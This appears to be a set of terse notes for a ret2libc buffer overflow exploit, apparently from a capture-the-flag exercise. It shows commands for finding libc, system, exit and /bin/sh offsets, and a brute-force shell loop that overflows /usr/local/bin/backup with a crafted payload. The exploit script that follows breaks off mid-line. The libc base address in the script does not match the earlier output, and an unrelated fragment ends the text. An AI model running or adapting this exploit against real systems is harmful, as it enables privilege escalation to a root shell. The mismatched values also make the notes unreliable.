Check if there is a Buffer Over Flow Vuln: ldd /usr/bin/filename | grep libc libc.so.6 => /lib32/libc.so.6 (0xf75df000) Get The value of System: readelf -s /lib32/libc.so.6 | grep system 245: 00110820 68 FUNC svcerr_systemerr@@GLIBC_2.0 627: 0003a940 55 FUNC _libc_system@@GLIBC_PRIVATE 1457: 0003a940 55 FUNC system@@GLIBC_2.0 we need the value of system@@GLIBC_2.0 " 0003a940" Get The value of Exit: readelf -s /lib32/libc.so.6 | grep exit 2263: 0002e7d0 78 FUNC on_exit@@GLIBC_2.0 Get The value of /bin/sh in libc: strings -a -t x /lib32/libc.so.6 | grep /bin/sh 15900b /bin/sh while true; do /usr/local/bin/backup -i $(python -c 'print "A" * 512 + "\x40\xa9\x03\x00\xb0\xe7\x02\x00\x0b\x90\x15\x00"'); done IPPSEC Buffer Overflow Exploit Code: from subprocess import call import struct libc_base_addr = 0xf75b000 system_off=0x0003a940 #system offset exit_off=0x0002e7d0 #exit offset a
Way to Divergence